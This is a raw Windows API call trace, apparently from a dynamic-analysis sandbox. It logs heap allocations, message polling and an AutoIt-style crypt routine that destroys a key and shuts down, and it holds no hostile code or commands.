[0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0234.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0234.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0234.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0234.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0234.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0234.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0234.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.077] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.077] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.078] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0234.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0234.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.295] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xb0d0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xb0d0, lpOverlapped=0x0) returned 1 [0234.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0234.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0234.298] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0234.298] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.299] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0234.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.299] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.300] CryptDestroyKey (hKey=0xa86f90) returned 1 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.301] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.302] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.302] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.302] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0234.303] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.303] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.303] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 